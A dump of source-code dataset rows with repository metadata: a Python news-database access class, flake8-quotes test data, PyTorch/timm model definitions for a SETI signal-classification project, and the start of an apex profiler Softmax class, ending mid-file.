"WHERE n.state=%s " \
"ORDER BY n.create_time DESC " \
"LIMIT %s,%s"
cursor.execute(sql,("need to approve",(page-1)*10,10))
result=cursor.fetchall()
return result
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
    # Query the total page count of news pending approval
def search_unreview_count_page(self):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT CEIL(COUNT(*)/10) FROM t_news WHERE state=%s"
cursor.execute(sql,["need to approve"])
count_page=cursor.fetchone()[0]
return count_page
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
    # Approve news
def update_unreview_news(self,id):
try:
con = pool.get_connection()
con.start_transaction()
cursor=con.cursor()
sql="UPDATE t_news SET state=%s WHERE id=%s"
cursor.execute(sql,("approved",id))
con.commit()
except Exception as e:
if "con" in dir():
con.rollback()
print(e)
finally:
if "con" in dir():
con.close()
    # Query the news list
def search_list(self,page):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT n.id,n.title,t.type,u.username " \
"FROM t_news n JOIN t_type t ON n.type_id=t.id " \
"JOIN t_user u ON n.editor_id=u.id " \
"ORDER BY n.create_time DESC " \
"LIMIT %s,%s"
cursor.execute(sql,((page-1)*10,10))
result=cursor.fetchall()
return result
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
    # Query the total page count of news
def search_count_page(self):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT CEIL(COUNT(*)/10) FROM t_news"
cursor.execute(sql)
count_page=cursor.fetchone()[0]
return count_page
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
    # Delete news
def delete_by_id(self,id):
try:
con = pool.get_connection()
con.start_transaction()
cursor=con.cursor()
sql="DELETE FROM t_news WHERE id=%s"
cursor.execute(sql,[id])
con.commit()
except Exception as e:
if "con" in dir():
con.rollback()
print(e)
finally:
if "con" in dir():
con.close()
    # Add news
def insert(self,title,editor_id,type_id,content_id,is_top):
try:
con = pool.get_connection()
con.start_transaction()
cursor=con.cursor()
sql="INSERT INTO t_news(title,editor_id,type_id,content_id,is_top,state) " \
"VALUES(%s,%s,%s,%s,%s,%s)"
cursor.execute(sql,(title,editor_id,type_id,content_id,is_top,"neew to approve"))
con.commit()
except Exception as e:
if "con" in dir():
con.rollback()
print(e)
finally:
if "con" in dir():
con.close()
    # Look up the user's cached record
def search_cache(self,id):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT n.title,u.username,t.type,n.content_id," \
"n.is_top,n.create_time " \
"FROM t_news n " \
"JOIN t_type t ON n.type_id=t.id " \
"JOIN t_user u ON n.editor_id=u.id " \
"WHERE n.id=%s"
cursor.execute(sql,[id])
result=cursor.fetchone()
return result
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
    # Find news by id
def search_by_id(self,id):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT n.title,t.type,n.is_top " \
"FROM t_news n " \
"JOIN t_type t ON n.type_id=t.id " \
"WHERE n.id=%s"
cursor.execute(sql,[id])
result=cursor.fetchone()
return result
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
    # Update news
def update(self,id,title,type_id,content_id,is_top):
try:
con = pool.get_connection()
con.start_transaction()
cursor=con.cursor()
sql="UPDATE t_news SET title=%s,type_id=%s,content_id=%s," \
"is_top=%s,state=%s,update_time=NOW() WHERE id=%s"
cursor.execute(sql,(title,type_id,content_id,is_top,"need to approve",id))
con.commit()
except Exception as e:
if "con" in dir():
con.rollback()
print(e)
finally:
if "con" in dir():
con.close()
def search_content_id(self,id):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT content_id FROM t_news " \
"WHERE id=%s"
cursor.execute(sql,[id])
content_id=cursor.fetchone()[0]
return content_id
except Exception as e:
print(e)
finally:
if "con" in dir():
con.close()
| 32.051163 | 93 | 0.476273 | 832 | 6,891 | 3.822115 | 0.109375 | 0.025157 | 0.03522 | 0.050314 | 0.852201 | 0.845283 | 0.830189 | 0.811321 | 0.811321 | 0.784591 | 0 | 0.005412 | 0.4101 | 6,891 | 214 | 94 | 32.200935 | 0.776876 | 0.011174 | 0 | 0.827225 | 0 | 0 | 0.187711 | 0.047626 | 0 | 0 | 0 | 0 | 0 | 1 | 0.062827 | false | 0 | 0.005236 | 0 | 0.115183 | 0.062827 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
42347d27f3583dd50f2f24a015f0bc7ccf675363 | 484 | py | Python | function/python/brightics/function/classification/__init__.py | janrenz/studio | a0714ed8dcd9dcd8d024162104d3b4de89ac2b49 | [
"Apache-2.0"
] | null | null | null | function/python/brightics/function/classification/__init__.py | janrenz/studio | a0714ed8dcd9dcd8d024162104d3b4de89ac2b49 | [
"Apache-2.0"
] | null | null | null | function/python/brightics/function/classification/__init__.py | janrenz/studio | a0714ed8dcd9dcd8d024162104d3b4de89ac2b49 | [
"Apache-2.0"
] | null | null | null | from .xgb_classification import xgb_classification_train
from .xgb_classification import xgb_classification_predict
from .decision_tree_classification import decision_tree_classification_train
from .decision_tree_classification import decision_tree_classification_predict
from .svm_classification import svc_train
from .svm_classification import svc_predict
from .logistic_regression import logistic_regression_train
from .logistic_regression import logistic_regression_predict | 60.5 | 79 | 0.904959 | 58 | 484 | 7.103448 | 0.206897 | 0.291262 | 0.252427 | 0.131068 | 0.883495 | 0.737864 | 0.300971 | 0.300971 | 0 | 0 | 0 | 0 | 0.078512 | 484 | 8 | 80 | 60.5 | 0.923767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
4248918459d21b998daed319f2b63307bd80f16f | 657 | py | Python | test/data/docstring_not_docstrings.py | domdfcoding/flake8-quotes | 1d8dd6b5a10c35fe65e96f53fffca12953e4004c | [
"MIT"
] | 136 | 2015-04-27T20:21:32.000Z | 2022-03-25T13:45:27.000Z | test/data/docstring_not_docstrings.py | domdfcoding/flake8-quotes | 1d8dd6b5a10c35fe65e96f53fffca12953e4004c | [
"MIT"
] | 101 | 2015-03-03T19:49:44.000Z | 2021-10-19T07:07:30.000Z | test/data/docstring_not_docstrings.py | domdfcoding/flake8-quotes | 1d8dd6b5a10c35fe65e96f53fffca12953e4004c | [
"MIT"
] | 42 | 2015-02-04T09:32:55.000Z | 2021-11-29T20:18:45.000Z |
var0 = True
l = []
if var0:
""" not a docstring"""
pass
while(var0 < 0 or "def" in l[:] ):
""" also not a docstring """
with open(l["def":]) as f:
""" not a docstring """
pass
if var0 < 10:
"""
not a multiline docstring
"""
pass
if var0:
''' not a docstring'''
pass
while(var0 < 0 or "def" in l[:] ):
''' also not a docstring '''
with open(l["def":]) as f:
''' not a docstring '''
pass
if var0 < 10:
'''
not a multiline docstring
'''
pass
# https://github.com/zheller/flake8-quotes/issues/97
def test():
{}["a"]
class test:
{}["a"]
| 14.6 | 52 | 0.480974 | 87 | 657 | 3.632184 | 0.344828 | 0.101266 | 0.246835 | 0.21519 | 0.78481 | 0.78481 | 0.78481 | 0.78481 | 0.78481 | 0.78481 | 0 | 0.036866 | 0.339422 | 657 | 44 | 53 | 14.931818 | 0.691244 | 0.076104 | 0 | 0.8 | 0 | 0 | 0.038251 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0.3 | 0 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
4260b1fb9f8a133613e1da5651f77c1b647ee23a | 20,779 | py | Python | src/models/modules/simple_bb.py | mohsinkhn/seti-kaggle-tezdhar | dd3b1dcb8729ed73c5bb6ce0041cd385c412156e | [
"MIT"
] | 3 | 2021-08-30T00:48:17.000Z | 2022-03-14T07:50:07.000Z | src/models/modules/simple_bb.py | mohsinkhn/seti-kaggle-tezdhar | dd3b1dcb8729ed73c5bb6ce0041cd385c412156e | [
"MIT"
] | null | null | null | src/models/modules/simple_bb.py | mohsinkhn/seti-kaggle-tezdhar | dd3b1dcb8729ed73c5bb6ce0041cd385c412156e | [
"MIT"
] | 2 | 2021-08-20T17:33:27.000Z | 2022-03-14T18:22:37.000Z | import timm
import torch
from torch import nn
import torch.nn.functional as F
from timm.models.layers.weight_init import trunc_normal_
class SimpleBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.drop(self.flat(self.avg(x))))
class FeaturesBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.flat(self.avg(x))
class FasterBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
self.model.blocks[0][0].conv_dw.stride = (2, 2)
# del self.model.classifier
# self.pool = nn.MaxPool2d((1, 2), (1, 1), padding=0)
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
#del self.model.conv_head, self.model.bn2
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.drop(self.flat(self.avg(x))))
class Simple3BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.drop(self.flat(self.avg(x))))
class Attention(nn.Module):
def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0.):
super().__init__()
self.num_heads = num_heads
head_dim = dim // num_heads
self.scale = head_dim ** -0.5
self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)
self.attn_drop = nn.Dropout(attn_drop)
self.proj = nn.Linear(dim, dim)
self.proj_drop = nn.Dropout(proj_drop)
def forward(self, x):
B, N, C = x.shape
qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)
q, k, v = qkv[0], qkv[1], qkv[2] # make torchscript happy (cannot use tensor as tuple)
attn = (q @ k.transpose(-2, -1)) * self.scale
attn = attn.softmax(dim=-1)
attn = self.attn_drop(attn)
x = (attn @ v).transpose(1, 2).reshape(B, N, C)
x = self.proj(x)
x = self.proj_drop(x)
return x
class Hybrid3BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 256
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 1)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 256, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class Hybrid4BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 16, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.mean(3)
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class Hybrid5BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 24, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.mean(3)
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class Hybrid5eBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 24 * 16, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
# x = x.mean(3)
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class Hybrid6BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 32, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.mean(3)
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class HybridFeatures(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 256
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 1)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 256, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return x
class Simple3Features(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.flat(self.avg(x))
class MultiBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# 128 * 512 x 6
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 384, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
b, n, c, h, w = x.shape
outs = []
for i in range(n):
out = self.model.forward_features(x[:, i]) # b x c x 4 x 16
out = out.view(out.shape[0], out.shape[1], -1) # b x c x 64
out = out.permute(0, 2, 1).contiguous()
out = self.fc0(out) # b x 64 x 512
outs.append(out)
x = torch.cat(outs, 1) # b x 384 x 512
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class BackgroundAttenuation(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.bn2 = nn.BatchNorm2d(320)
self.fc1 = nn.Linear(320, 1)
def forward(self, x1, x2):
x1 = self.model.conv_stem(x1)
x2 = self.model.conv_stem(x2)
x2attn = torch.sigmoid(x2)
x1 = x1 * (1 - x2attn)
x1 = self.model.blocks(self.model.act1(self.model.bn1(x1)))
x2 = self.model.blocks(self.model.act2(self.model.bn1(x2)))
x1 = x1 * (1 - torch.sigmoid(x2))
x1 = self.model.global_pool(self.model.act2(self.bn2(x1)))
return self.fc1(self.drop(x1))
class TfmBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1)
def forward(self, x):
return self.model(x)
class Ch2(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=2, num_classes=1)
def forward(self, x):
return self.model(x)
class SimpleStride1(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
self.model.conv_stem.stride = (1, 1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.flat(self.avg(x)))
class SimpleSum(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
self.model.conv_stem.stride = (2, 1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
x = x.mean(2).mean(2)
return self.fc1(x)
class EffMod(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model('tf_efficientnet_b0_ns', pretrained=True, in_chans=1, num_classes=1)
del self.model.classifier, self.model.conv_head
self.fc1 = nn.Linear(320, 1)
def forward(self, x):
x = self.model.conv_stem(x)
x = self.model.bn1(x)
x = self.model.act1(x)
x = self.model.blocks(x)
return self.fc1(self.model.global_pool(x))
class SimpleBB2(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model('resnest14d', pretrained=True, in_chans=1, num_classes=1)
self.model.conv1.kernel = (11, 3)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.flat(self.avg(x)))
class MaxMeanBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
x = x.max(2)[0]
x = x.mean(2)
return self.fc1(self.flat(x))
class Ch3(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(p=hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.drop(self.flat(self.avg(x))))
class Ch6(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.max = nn.AdaptiveMaxPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(p=hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features * 2, 1)
def forward(self, x):
x1 = self.model.forward_features(x[:, :3])
x2 = self.model.forward_features(x[:, 3:])
x1 = self.flat(self.avg(x1) + self.max(x1))
x2 = self.flat(self.avg(x2) + self.max(x2))
x = torch.cat((x1, x2), -1)
return self.fc1(self.drop(x))
class SetiCNN9(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.conv1 = nn.Conv2d(1, 24, kernel_size=(34, 3), stride=(2, 1), padding=(1, 1), bias=False)
self.bn1 = nn.BatchNorm2d(24, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.act1 = nn.SiLU(inplace=True)
block1 = []
for _ in range(3):
layer = nn.Sequential(
nn.Conv2d(24, 24, kernel_size=(7, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(24, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True)
)
block1.append(layer)
self.block1 = nn.Sequential(*block1)
self.block2 = nn.Sequential(
nn.Conv2d(24, 96, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(96, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True),
nn.Conv2d(96, 144, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(144, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True),
nn.Conv2d(144, 144, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(144, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True),
nn.Conv2d(144, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True),
nn.Conv2d(256, 1024, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(1024, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True)
)
self.mean = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc = nn.Linear(1024, 1)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.act1(x)
x = self.block1(x)
x = self.block2(x)
x = self.mean(x)
return self.fc(self.flat(x))
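A quick sanity check of the conv1 geometry in SetiCNN9 above. This sketch is not from the repo; the 273x256 input size is an assumption (a plausible single-channel spectrogram shape), and conv2d_out is a hypothetical helper implementing the standard Conv2d output-size formula floor((size + 2*padding - kernel) / stride) + 1:

```python
def conv2d_out(size, kernel, stride, padding):
    """Spatial output size of a Conv2d along one dimension:
    floor((size + 2*padding - kernel) / stride) + 1."""
    return (size + 2 * padding - kernel) // stride + 1

# conv1 above: kernel_size=(34, 3), stride=(2, 1), padding=(1, 1)
h = conv2d_out(273, 34, 2, 1)   # height axis: (273 + 2 - 34) // 2 + 1
w = conv2d_out(256, 3, 1, 1)    # width axis:  (256 + 2 - 3)  // 1 + 1
print(h, w)  # 121 256
```

The tall (34, 3) kernel with stride (2, 1) halves the frequency/height axis while preserving the time/width axis, which the later AdaptiveAvgPool2d then collapses to 1x1.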
class Ch3Effb7stem(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
model1 = timm.create_model('tf_efficientnetv2_l_in21k')
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1)
self.model.conv_stem = model1.conv_stem
self.bn1 = model1.bn1
del model1
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.flat(self.avg(x)))
class Ch6(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1, in_chans=6)
def forward(self, x):
x = self.model(x)
return x
class Ch9(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=9)
self.mean = nn.AdaptiveAvgPool2d((1, 1))
self.drop = nn.Dropout(hparams['dropout'])
self.fc = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
x = self.mean(x)
x = x.view(x.size()[0], -1)
x = self.drop(x)
return self.fc(x)
| 35.398637 | 107 | 0.594543 | 2,960 | 20,779 | 4.023311 | 0.065541 | 0.084642 | 0.019145 | 0.034008 | 0.845159 | 0.813922 | 0.80796 | 0.794861 | 0.791586 | 0.779243 | 0 | 0.043627 | 0.256509 | 20,779 | 586 | 108 | 35.459044 | 0.727232 | 0.027047 | 0 | 0.710638 | 0 | 0 | 0.017431 | 0.002278 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129787 | false | 0 | 0.010638 | 0.004255 | 0.255319 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4271a8d9497b5ada64108c710341bba504b2037b | 2,190 | py | Python | apex/pyprof/prof/softmax.py | oyj0594/apex | b66ffc1d952d0b20d6706ada783ae5b23e4ee734 | [
"BSD-3-Clause"
] | 6,523 | 2018-04-25T17:35:27.000Z | 2022-03-31T22:49:45.000Z | apex/pyprof/prof/softmax.py | oyj0594/apex | b66ffc1d952d0b20d6706ada783ae5b23e4ee734 | [
"BSD-3-Clause"
] | 1,100 | 2018-05-18T00:03:34.000Z | 2022-03-30T22:00:33.000Z | apex/pyprof/prof/softmax.py | oyj0594/apex | b66ffc1d952d0b20d6706ada783ae5b23e4ee734 | [
"BSD-3-Clause"
] | 1,057 | 2018-05-07T13:53:04.000Z | 2022-03-31T09:18:47.000Z | from collections import OrderedDict
from .utility import Utility
from .base import OperatorLayerBase
class Softmax(OperatorLayerBase):
def __init__(self, d):
marker = eval(d.argMarker[0])
mod = marker['mod']
op = marker['op']
args = marker['args']
self.marker = marker
self.mod_ = mod
self.op_ = op
self.args = args
assert (mod == "torch.nn.functional")
assert (op == "softmax")
#Filter out named parameters
args = list(filter(lambda x : x['name'] == '', args))
assert (len(args) <= 2)
self.shape = args[0]['shape']
self.type = args[0]['dtype']
self.dir = d.dir
return
def op(self):
return self.op_
def mod(self):
return self.mod_
def tc(self):
return "-"
def params(self):
p = OrderedDict([('T', self.shape), ('type', self.type)])
return p
def elems(self):
return Utility.numElems(self.shape)
def flops(self):
